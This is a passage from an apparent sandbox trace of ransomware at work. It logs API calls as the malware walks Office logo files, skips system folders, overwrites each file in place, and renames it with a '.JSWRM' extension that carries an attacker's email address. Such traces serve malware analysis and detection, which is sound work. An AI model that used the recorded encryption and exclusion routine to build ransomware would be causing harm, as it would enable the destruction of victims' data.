Office\\root\\Office16\\LogoImages\\FirstRunLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.614] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1992206f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992206f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1992206f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x649, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogo.scale-80.png", cAlternateFileName="FI8090~1.PNG")) returned 1 [0132.614] lstrcmpiW (lpString1="FirstRunLogo.scale-80.png", lpString2=".") returned 1 [0132.614] lstrcmpiW (lpString1="FirstRunLogo.scale-80.png", lpString2="..") returned 1 [0132.614] lstrcmpiW (lpString1="FirstRunLogo.scale-80.png", lpString2="...") returned 1 [0132.614] lstrcmpiW (lpString1="FirstRunLogo.scale-80.png", lpString2="windows") returned -1 [0132.614] lstrcmpiW (lpString1="FirstRunLogo.scale-80.png", lpString2="recovery") returned -1 [0132.614] lstrcmpiW (lpString1="FirstRunLogo.scale-80.png", lpString2="perflogs") returned -1 [0132.614] lstrcmpiW (lpString1="FirstRunLogo.scale-80.png", lpString2="documents and settings") returned 1 [0132.614] lstrcmpiW (lpString1="FirstRunLogo.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0132.614] lstrcmpiW (lpString1="FirstRunLogo.scale-80.png", lpString2="system volume information") returned -1 [0132.614] lstrcmpiW (lpString1="FirstRunLogo.scale-80.png", lpString2="msocache") returned -1 [0132.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.scale-80.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0132.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.scale-80.png", cchWideChar=25, lpMultiByteStr=0x2413a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 25 [0132.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.scale-80.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0132.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.scale-80.png", cchWideChar=25, lpMultiByteStr=0x2412b8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 25 [0132.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.615] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1609) returned 1 [0132.615] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.615] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x640, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x640, lpOverlapped=0x0) returned 1 [0132.617] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.617] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x640, lpOverlapped=0x0) returned 1 [0132.617] CloseHandle (hObject=0x238) returned 1 [0132.617] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.618] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1996e644, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1996e644, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1996e644, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5d7, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogoSmall.contrast-black_scale-100.png", cAlternateFileName="FI5507~1.PNG")) returned 1 [0132.618] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-100.png", lpString2=".") returned 1 [0132.618] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-100.png", lpString2="..") returned 1 [0132.618] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-100.png", lpString2="...") returned 1 [0132.618] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-100.png", lpString2="windows") returned -1 [0132.618] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-100.png", lpString2="recovery") returned -1 [0132.618] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-100.png", lpString2="perflogs") returned -1 [0132.618] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0132.618] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0132.618] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-100.png", lpString2="system volume information") returned -1 [0132.618] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-100.png", lpString2="msocache") returned -1 [0132.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-black_scale-100.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0132.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-black_scale-100.png", cchWideChar=46, lpMultiByteStr=0x22ce70, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 46 [0132.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-black_scale-100.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0132.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-black_scale-100.png", cchWideChar=46, lpMultiByteStr=0x22cdc8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 46 [0132.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.619] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1495) returned 1 [0132.619] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.619] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x5d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x5d0, lpOverlapped=0x0) returned 1 [0132.621] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.621] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x5d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x5d0, lpOverlapped=0x0) returned 1 [0132.621] CloseHandle (hObject=0x238) returned 1 [0132.621] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.622] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1992206f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992206f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1992206f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x698, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogoSmall.contrast-black_scale-140.png", cAlternateFileName="FI782A~1.PNG")) returned 1 [0132.622] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-140.png", lpString2=".") returned 1 [0132.622] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-140.png", lpString2="..") returned 1 [0132.622] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-140.png", lpString2="...") returned 1 [0132.622] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-140.png", lpString2="windows") returned -1 [0132.622] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-140.png", lpString2="recovery") returned -1 [0132.622] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-140.png", lpString2="perflogs") returned -1 [0132.622] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0132.622] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0132.622] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-140.png", lpString2="system volume information") returned -1 [0132.622] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-140.png", lpString2="msocache") returned -1 [0132.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-black_scale-140.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0132.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-black_scale-140.png", cchWideChar=46, lpMultiByteStr=0x22cdc8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 46 [0132.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-black_scale-140.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0132.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-black_scale-140.png", cchWideChar=46, lpMultiByteStr=0x22d260, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 46 [0132.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.623] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.623] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1688) returned 1 [0132.624] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.624] ReadFile (in: hFile=0x238, lpBuffer=0x2323e8, nNumberOfBytesToRead=0x690, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesRead=0x345e89c*=0x690, lpOverlapped=0x0) returned 1 [0132.625] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.625] WriteFile (in: hFile=0x238, lpBuffer=0x2323e8*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesWritten=0x345e898*=0x690, lpOverlapped=0x0) returned 1 [0132.625] CloseHandle (hObject=0x238) returned 1 [0132.625] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.626] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1992206f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992206f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1992206f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogoSmall.contrast-black_scale-180.png", cAlternateFileName="FID9A4~1.PNG")) returned 1 [0132.626] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-180.png", lpString2=".") returned 1 [0132.627] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-180.png", lpString2="..") returned 1 [0132.627] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-180.png", lpString2="...") returned 1 [0132.627] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-180.png", lpString2="windows") returned -1 [0132.627] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-180.png", lpString2="recovery") returned -1 [0132.627] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-180.png", lpString2="perflogs") returned -1 [0132.627] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0132.627] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0132.627] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-180.png", lpString2="system volume information") returned -1 [0132.627] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-180.png", lpString2="msocache") returned -1 [0132.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-black_scale-180.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0132.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-black_scale-180.png", cchWideChar=46, lpMultiByteStr=0x22d260, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 46 [0132.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-black_scale-180.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0132.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-black_scale-180.png", cchWideChar=46, lpMultiByteStr=0x22d0d8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 46 [0132.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.628] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2048) returned 1 [0132.628] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.628] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x800, lpOverlapped=0x0) returned 1 [0132.629] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.629] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x800, lpOverlapped=0x0) returned 1 [0132.630] CloseHandle (hObject=0x238) returned 1 [0132.630] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.631] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1996e644, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1996e644, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1996e644, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x552, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogoSmall.contrast-black_scale-80.png", cAlternateFileName="FI5606~1.PNG")) returned 1 [0132.631] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-80.png", lpString2=".") returned 1 [0132.631] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-80.png", lpString2="..") returned 1 [0132.631] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-80.png", lpString2="...") returned 1 [0132.631] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-80.png", lpString2="windows") returned -1 [0132.631] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-80.png", lpString2="recovery") returned -1 [0132.631] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-80.png", lpString2="perflogs") returned -1 [0132.631] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0132.631] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0132.631] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-80.png", lpString2="system volume information") returned -1 [0132.631] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-black_scale-80.png", lpString2="msocache") returned -1 [0132.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-black_scale-80.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0132.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-black_scale-80.png", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 45 [0132.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-black_scale-80.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0132.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-black_scale-80.png", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 45 [0132.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.632] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1362) returned 1 [0132.632] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.632] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x550, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, 